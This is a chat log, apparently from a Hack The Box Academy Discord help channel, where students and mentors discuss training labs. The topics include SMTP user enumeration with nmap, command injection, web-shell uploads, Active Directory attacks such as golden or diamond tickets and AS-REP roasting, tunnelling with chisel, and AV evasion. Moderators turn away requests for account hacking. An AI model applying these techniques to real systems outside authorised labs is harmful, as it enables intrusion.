Hi, I have a question, does if I active the step-by-step solution the cubes I should earn when complete a questions turns to zero ?

Not all questions give cubes, in some modules only the final skill assessment gives cubes. Are you sure it says you’d be getting cubes before you activate the option?

Got it, I think that questions didn't gives cubes

i’m currently in the SMTP section of the footprinting module, and i have the footprinting wordlist to enemurate the user on the smtp server, how would i use this Wordlist to filter out which users are active on the system?

it give me the ip not 0.0.0.0 it's just a example but when typing that ip into browser it gives nothing

to add on to this, i’ve tried using an nmap script to use the custom wordlist which is a resource in the module, it looks like the nmap scan isn’t picking up the users, just generic names such as “root” or “admin”

Do a little bit of google searching, iirc the nmap script SHOULD work but if it doesn't there's a couple of alternatives

Think i’ve got it with some google

I hope lol

i definitely need to use google more, my biggest problem is not knowing what to google

Looking back at it now I don't think the nmap script's default wordlist has the proper names and have no clue how to change it

I had to scrap nmap and just use script-enum-users

done some research on the syntax, got it in the end

yeah looking through the args it's not very straightforward for nmap

we got there in the end

nmap <SNIP> --script-args brute.creds="<PATH TO WORDLIST>",brute.mode="user"

could you try this out? don't have my vm handy ^

sure

what am i putting on <snip>

the script and other args you might wanna use

hi

Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it? here I don t know where to look

I tried also source code and could not find the right answear, any sugestions?

My suggestion is: be more specific, which module and section?

module

Command Injections

injecting commands "

Nice, so now someone who's actually done that module can get back to you.

Can you send me hackthebox link I one to verify

You can find it in #welcome along with the instructions

That's illegal, go contact google support, we are not a hacker4hire server

I've already tried

Haven’t done the module, but having a look at it, it looks like if you compare the burp post request and response, you may find a clue on what html <tag> you should look for

Hey guys, for module: GPP Passwords, When I run the first command in powershell it says : it cannot be loaded because running scripts is disabled on this system.

Thank my friend

Nvm I guess I have to : SetExecutionPolicy

how can i reach htb support, please I'm stuck

I'm working my way through the first skills assessment in "Active Directory Enumeration & Attacks" and I'm doing something wrong in the process of trying to solve the fourth question. Without giving too much away, I get a scrolling DNS error message when I try to execute the command to get the answer, then my laptop crashes. I'm not using PwnBox and I've even checked the solution provided and followed the same steps - same result, DNS error & crash. Can Anyone give me a pointer?

im stuck on https://academy.hackthebox.com/module/145/section/1295
i got ports back from the ffuf 'scan' i had to do, but i cant connect to the ports. what do i do?

Hey, I’m currently going through the IMAP/POP3 section, trying to find the admin email address, i have openssl into the Server and used the credentials given - however i can’t grasp how to get the email address from this can someone point me in the right direction?

use body[] instead of all in the imap fetch command

researching imap commands helps :)

any help with this ? 😦 Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

well look at the source code and look for any bit of validation of what's being typed in or uploaded or whatever it is you're doing

still did not find it

I don t know where to look

1. what module are you doing
2. if it's above tier 0 (and even then) don't share lab content -_-

lesson Injecting Commands , module Command injections

there's a line that contained regex, maybe that's the line :)

still not the right answear :/

yep it is

it is not

line 10 it says incorrect

count from the declaration <!Doctype html>

still not right answear

or view in browser --> view page source

I done that too :/

well not sure how you're getting the wrong answer

it gives too little informations to identify the right answear

?

you're very close

you have to include the doctype declaration in your counting

there's not much more information it can give you aside from having an inline comment on it that says "<!-- here's the validation -->"

I don t know where you see <! , I looked at every line and did not find it

sorry misspoke; i meant it'd be more obvious if it had the inline comment

but <!Doctype html> is where you start your line count (from 1)

I know , and still did not find the right answear

you're off by one earlier

still not

when you view source in browser there's handy line numbers next to the lines on the lefthand side

...

still not

not even 14

wrong direction

||also off by one, not two||

i am stuck at linux fundamentals

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

still not found

dm because this is ridiculous at this point

can anyone tell me why ssh is not connecting to terminal

not even line 13 :/

welp, found the right answear :/

empty lines still count as lines

<?php echo "example">


e

4 lines even though there's only 1 line of code;

(discord didn't like the empty lines >:( )

hi!

Stuck on the File Uploads Assessment.

Able to read the source, got the path, even uploaded the shell.

but getting 404

🙂

make sure you understand what the upload function is doing to your file

maybe try and replicate it in your own terminal (may have to slightly modify) using PHP -r

i.e. php -r <insert the code here> replacing function references to your upload with 'test' or something along those lines

yeah I tried to bypass by understanding the code. still somehow failed.

there's something that's functionally happening to your upload filename before it's uploaded

i believe it's near the top of the code that it happens

well it's formatting it a specific way

also spoilers

I saw it earlier, and tried with that name and path as well.

look into the command it's running

well, let me dive deeper.

https://onecompiler.com/php here's an online php compiler

just a quick one: Linux Privilege Escalation - docker. I have the flag. in the P.O.C they get the SSH key so they can remote in as the user. is this just to show us what is possible or can this be achieved on the box. I didn't want to chase a rabbit hole 🙂 or break anything lol

Ok, so just to clarify: The task is NOT about trying to exploit the ticketing app, similar to ticketer, but rather just use some of the credentials being presented in the section??

correct; gaining access to an app via some credentials you harvested and utilizing search features within to find information

when you say "you harvested", is this exercise related to the previous exercises in the "Attacking Common Applications" or is it about using something from the text part? Sorry for being persistent but I am just confused

i thought i found the flag for the question on "Network Enumeration with Nmap | Nmap Scripting Engine" but it doesn't seem to be taking it as an answer? Could it be the wrong flag that's there from a different exercise?

all the info needed is on the page; i'm just generalizing the information

you may have found a flag for something else

some modules reuse the same lab over a couple sections

Also, I found that sometimes I need to log out to HTB and log in again to get the flag accepted, if my login session has been running over night. Worth trying.

Added in a screengrab of the error & have confirmed that PwnBox works as expected - so am assuming there is something wrong on the local laptop now.

no idea about the DNS-request issue tbh i don't recall needing to do anything like that

Hello one more question if i buy the subscription do i still pay cubes ?

Like I said, PwnBox works fine for the same process, so am assuming something has gone off track in my laptop.

monthly subs: yes as those allot x cubes per month (except student)
annual subs are access based:
Silver gives access to t2 and below modules
Gold gives access to t3 and below

well allot distribute

cubes don't expire

ok, so I'm trying to exploit the app, similar to|| the HTB box with osTicket ||, but am not succeeding, so am I overcomplicating it?

you may be overcomplicating it

there's credentials given in the section

you're not bruteforcing the user/pass on this

even the official solution (when i had access to it) says to use the sample creds given by the section

(imo annoying, but is what it is)

Ok thanks, already had tried all the creds without access, so thats why I started doubting what the exercise was about, and started trying to exploit it (which would have been more fun). I will try again, and if access is denied I'll raise it with support I guess (?)

make sure to try variations of the usernames with and without the @ domain

Thanks! 👍

im going to assume not, Ill move on.

Now I'm really staring to get angry. Non of the combinations works. This is not teaching me anything. This is pure frustration. whats the point of this exercise???? And which is the combination? I am getting locked out after a few attempts, then haw to respawn and try the same again, just to be locked out

should be k*

ok, I'll give it one more try. Thanks for responding!

make sure you're signing into the ||agent portal||

worked for me

[not included is username for what should be obvious reasons]

Thanks, I'll go again. Once again, really appreciate you responding.

any online support here?

As a benefit of my initial confusion, I got to read up on osTicket exploits, and try some out, so thanks to that I actually learnt 😅 Now, everything good. Sorry for getting frustrated and appreciate your patience.

There is no support on discord - only on the site.

I am having an issue: Exploiting Web Vulnerabilities in Thick-Client Applications

I cannot get the fatty-client-new.jar app to open after rcompiling it

I have reached out to support and they said check here. Has anyone had this issue

Hi guys, i've been stuck for a while in the information gathering module, i solved the issue, but i have a doubt on what is the difference between ffuf and gobuster for Virtual host fuzzing, cause i notices ffuf gives like every word in the wordlist as aa possible vhost, this way it doesnt sound much useful, i was wondering if i missed something on how to use it

I hate my life

I got this , Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file? , I tried via burp suit and didn t show anything but erors

how should I proceed?

module , Command Injections , lesson Bypassing Space Filters

The module has it

can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DK01. Can someone in DM check if I am doing this correctly or if I am missing something?

I spent hours on it

Likely, you are trying to compile those .java files src folder straight away into .jar. I believe the correct way is to convert the specific edited one back to .class, replace the relevant original fatty client .class and then compile that folder with all.class files to get the .jar

Provided - you have done the earlier steps correctly

Anyone able to give some hints on Advanced SQL Injection Skill Assssment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck

Module> Getting Started- Public Exploits. The question is asking for flag. After running NMAP I only see SSH and rpcbind open. Scan for exploits using searchsplit and metasploit. Find a few but doesn't appear to be the right direction. Look at the solution and the first thing they have you do is open a web browser. Why? This port didnt appear up and it nmap shows http closed despite the webpage loading, why?

the port given is the web port as you're given a public_ip:port; when you're given a target in that format your only scope is the ip:port

http doesn't have to be 80

LDAP AD Module

It says this command then i use it and it doesnt work.

And zero AD commands work...

Any help as to why it cant reach the AD server ?

Its evil win rm, it could be Kerberos double hop problem. Although, I’m not sure

What should I use to connect CLI then

Use different characters in ESSID Stripping.

Not 100% sure it is the case but you can try passing your creds along, or even try RDP if its open

pscredential

Hello folks I just needs help

help with what?

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

Bi am reaching at a point where it said I should create a ngronk account and get autho token to run to create payload

what module is that for?

Thank you! I figured it out at the end. I was still unable to ssh or rdp into the Kali, but for the purposes of this lab, once I restarted my computer and re-did everything, the remote desktop from bob worked.

for what academy module? as far as I know there's no academy module for android maldev

this channel isn't for help with random maldev stuff if you wanna read and follow #welcome you'll have access to more of the server

but it sounds like what you're working on is unrelated to htb academy

It's just a part of learning and not something else I am crybersecurity student

This channel is about the modules in the HTB Academy. Verify your user to use better channels for your question

tried a bunch eventually happended completly random after a vm restart

The other 2 are just as straightforward as they seem?

Hey @acoustic owl since u are here i wanna ask u, did u delve into exploit development and process injections? If so what did u do / learn

@azure depot we don't do account hacking here;

1. that's illegal
2. see #rules

OKAY okay

Thanks...

I'm rly desperate to find the truth

No, I haven't dealt with it yet

sounds like a scam took place but there's nothing we can do about it; you'd have to reach out to authorities

Ye that's what happened.

but as stated: this server isn't a hacker4hire server or anything like that

Anyone do the new process injection module

Or any EXP dev ?

Second and third are easy. I am having problems with first task. Captured handshake, but cannot install apache for capture portal setup.

no but ive done a couple mentioned in the course

ask

Hi guys, I'm in the ADVANCED SQL INJECTIONS Module Skill assesments - Questions 2:
I could get the user and now I’m struggling with RCE, I can tell you what I’ve tried so far.
||I got pg_sleep but I noticed that I do not have superuser privileges, then I’m trying to grant privileges for it but nothing is working.|| Am I in the right path?

Please help, I'm very tired of this module, very hard tbh

Hello Everyone
After finishing the Bug Bounty Hunter Path of the CBBH Cert, what other HTB Academy modules or external resources would you recommend to deepen my knowledge in web security?

Go for CWEE

thank you

Anyone else having issues rdp-ing into Evasion Dev on Windows Evasion Module Introduction section? Can rdp to Evasion Target just fine

having issues interacting with target machines in general in academy right now. started about an hour ago for me.

having trouble on both pwnbox and VPN connection.

Alright so I’m not alone. It was driving me nuts and gave up for the day.

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Can I DM U about the Process Injection Module?

DM u?

hold on a sec

@river aspen can i open a ticket

i haven't done that module

Hi folks, currently doing the AEN module blindly. I got DA, but there was a second NIC, so I pivoted again and found a host with SSH open. Is there something more to it, or the guide basically has creds for going in getting another flag?

You missed something

Heyyyyy

Why cant I talk in general

#welcome look under Verification

is it a ||UDP port|| on that host? Or am I missing a completely different host here?

there are common things you didnt check after DA

not what you said

I got it now, thanks. This was kinda easy, I expected a lot more on the second pivot

I have a question about Intro to Window Evasion module. The way it designs is to upload payload on the target machine, open netcat and automatically will get revshell after waiting couple minutes.

How.... does that happens?
If i decide to do it on another box, can i just wait for the revshell to trigger too ?

there's a program running that checks every 30s or minute i forget which. and no, if you spawned another target box on another section it would kill your current target.

yea, i was tryna do it on another box. when i trigger exe, it ask for dll file, when i upload both exe and dll file, i got result like...

||Architecture: x64
App host version: 6.0.10
.NET location: Not found

Learn about runtime installation:
https://aka.ms/dotnet/app-launch-failed

Download the .NET runtime:
https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win10-x64&apphost_version=6.0.10||

so how.... can i utilize what i learn from that module to the other lab? that is my main question

it's teaching you how to evade the av software

so when you attack boxes your payloads aren't flagged

You didn't compile it statically as a .NET program.

Hey everyone, I'm in the Windows Attacks and Defense and my RDP into the target/bob keeps on dropping. Anyone else at the same point and experiencing an issue? I've been troubleshooting for 2 days now, and can't figure out what's going on. I managed to work for a couple of hours earlier today without interruptions, but I'm stuck again. The window connects and Windows desktop pops up for a few seconds, then disconnects again.

Have you tried swapping to a TCP vpn?

i have

Welp that's my one bullet

I get "Host key for [ip] has changed and you have requested strict checking.
"

anyone encounter host key issue? how are there so many lab issues I get time to sit down and study I can't even study

nope

you aren't on the vpn with the pwnbox powered up at the same time, are you?

nope

are there any mods or student mentor I can ping?

oh you are mod Hi @cloud urchin

what is the host key issue?

i think this is the answer for my problem, thank you so much

I just spammed it three different times, not I'm finally in and usually it crashes. I'll see if it stays on and I can RDP to the next box

your ssh client stores the host key bast on the hostname/IP pair in ~/.ssh/known_hosts, sounds like you've respawned the target and it has a new ip. you need to remove the old hostkey and then reconnect.

you can't have the pwnbox and the VPN on at the same time, they both share the same IP and it will cause connectivity issues

understood - i do not use the pwnbox at all, im only using ovpn

i've noticed some servers are worse than others, if RDP is unbearably slow try changing servers or maybe even regions.

also use the TCP VPN instead of UDP as it's more stable

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

you could also try adjusting the MTU as described in the link I provided above

Hey guys, how are you? I have a little problem with a question in the password cracking module in the network services section, where I was trying to crack the RDP password but it doesn't find it.

I have the same VPN with which I did the WinRM and SSH one where I found them easily, I tried to contact support but they couldn't give me a solution and they told me that the server works fine and to ask here on discord

are you using the provided username and password lists from the resources section?

Yeah

Sorry for the spoiler, I didn't realize.

review your command vs what is shown in the module

it's wasn't the same as what i see

At the beginning I used the same command, but it didn't work, so I added things to see if it improved the results.

I even tried with netexec to see if I had a different result and it didn't work either.

ok let me try

Perfect, I'll be waiting, thank you very much.

yeah i was able to get it in a few seconds

i just used the provided commands

I'll put the same commands and in 10 minutes or so I'll show you.

ok DM me

There I have written to you

Hello guys I can't access the XSS Hijacking Session because the target doesn't have a port? ip:port should be like this but mine only has an ip of target.

did you try the standard web ports?

I was able to access it.

the problem is I think I need to connect to vpn first.

yeah if the target doesn't spawn with a port you'll need to be on the vpn to access it

Anyone able to give some hints on Advanced SQL Injection Skill Assssment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck

do some targets in academy have lower resolution? Just did an RDP on one of the targets (parrot OS) even looking at the display settings there is no option to increase the resolution. I am using remmina

Hello,
I'm still fighting the "Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"
I have working proxy, credentials and tool to begin an attack but all i get is a timeout error
Other tools are working fine with proxy, so i don't know why this one is getting time out, i've check the port by powershell on jump-host and everythings seems open to attack

This is : AD Enumeration & Attacks - Skills Assessment Part I

should be an option in remmina for screen resizing, but yeah some just have weird resolutions

as far as i've known, the icon in the middle toggles dynamic resolution. And it's unavailable. But the important thing is I finished the part with low resolution lol

In client there is Use client resolution

It helps, but i found a bug when you are make the initial connection with RDP it cant connect with client res

so initial connect is with initial window size, the second connection is with client resolution

and everything works just fine

also there is a option in xfreerdp /dynamic-resolution that helps a lot

by client, you mean the linux or the OS you're using?

OH, the remmina

in the new connection profile, you need to scroll down a lil

and there are the resolution options

so if the remmina creates a windows, it changes resolution on fly

that just goes to show I haven't explored this tool lol. You are a lifesaver @willow furnace configured it to use client resolution. But I am currently in an RDP session so maybe this might take effect next session

"Hey everyone, I’m new to the world of ethical hacking and still have a lot to learn. I don't have much experience yet, and all I have right now is my phone. Could anyone guide me on how I can start learning and what resources I should focus on? Any advice would be greatly appreciated!"

What can i add is that connection Parrot -> jump-host is just fine, Then proxy to DC is not working. Even -Pn with nmap shows nothing

I can ping DC from jumphost, but the proxy from parrot is getting timeouted

Hiii people , I’m new to ethical hacking and still have a lot to learn. I don't have much experience yet, and all I have right now is my phone and laptop elite book. Could anyone guide me on. Im also learning from cybrary. But someone told me its not much practical. Any guidance??

FOR ANYONE STRUGGLING WITH THIS ONE:
-> the attack on Domain Controller will be infinitly harder with proxy, so there is another way
-> take a look at one of the host in the corp network, maybe you can figure something with remote desktop stuff
-> at the host, if you have previous puzzles it will be so much easier to solve it

dude @willow furnace you're also on AD enum and attack module?

yessir

on the Assessment part rn

just started this module and the slow response from the rdp frustrates me so I setup a proxy

I'm curious what proxy are you using btw?

chisel, it works just fine

It needs to be downloaded on both machines right (assuming that the target has it already)

I used ligolo so that I'll just transfer the agent via pyserver or ssh

the setting up of the tunnel is the annoying part

the parrot os have 1.10.0 ver so be aware of that

the newest one is 1.10.1

is this the target?

the pwnbox

most of the time you need to upload the second chisel to target

hmm how will I know what version of parrot is the pwnbox?

the pwnbox is the VM that they give you

idk if you are using theirs VMs or your own Kali/Parrot/distro

oh nvm found it

It's 5.0

I use my own VM (kali) then just openvpn to the pwnbox (or target)

but ligolo works well also in this version. I just configured the agent because there's a missing GLIBC on the target

Hello, I finished Footprinting's Hard assessment, and I have a few questions on one of the steps to find the flag, is anyone available for a quick mp 🙂 ?
Have a good day

just ask the question

try not to be too revealing though

It's about one of the steps to the flag, so I would be spoiling 😓

ok fair enough, sent a friend request so you can DM me

Hi, I have some questions regarding proxychains..

So I have already added the IP and the domain name into /etc/hosts file. however i keep getting this error

is there something i am missing?

Looks like it's tryna go through DNS, there should be a setting in your proxychains.conf that you can uncomment

It is already uncommented though

... found the issue

was just about to mention /etc/resolv.conf

I'm a bit confused, why is it reading from this file instead of proxychains.conf

Cos you're passing in a domain name instead of an IP it tries to resolve that domain name through the specified DNS

So am i right to say that, if i want to connect to the target, i should be putting the target's dns IP?

gimme 2 mins I'm actively looking for an old pdf with notes on precisely this

alright, my other question is, do i have to re-establish my chisel connection if i changed my settings?

you need their actual ip not their dns resolver

asking this because im doing an assessment that only allows chisel connections, otherwise i would have used ligolo

chisel is not dns dependent

the only time chisel is relevant is if your server is set up on a domain rather than an ip

Welp can't find the notes

Actually might have to comment this line

Im not sure if this means it is working now?????

im doing asreproasting

Well it's hitting Kerberos port so...

i placed nameserver 172.16.15.3 into resolv.conf

earlier it kept looking for 1.1.1.1 then the 4.2.2

seems about right depending on your resolv config

Yeah this is probably the way to go...
then again: Ligolo-ng

it kept searching for INLANEFREIGHT.LOCAL at 1.1.1.1:53

then i was like, bruh, why you looking for 1.1.1.1 at port 53

I'll try doing this later

can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DK01. Can someone in DM check if I am doing this correctly or if I am missing something?

ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:c1:89:90:7f:fd:4f:60:e0:54:f3:85:e6:35:6c:2b (RSA)
| 256 e1:8e:53:18:42:af:2a:de:c0:12:1e:2e:54:06:4f:70 (ECDSA)
|_ 256 1a:cc:ac:d4:94:5c:d6:1d:71:e7:39:de:14:27:3c:3c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

it say wrong answer

Which module is this from?

nmap

Did you try just putting the version number?

tried everything

ahh you are in the last skill assessment, you must verify well all the ports that are there (obviously bypassing the firewall)

can u show me how i even scrippted but no use

You should reread the content of firewall evasion, I can only tell you that you must list everything

..... ok will read again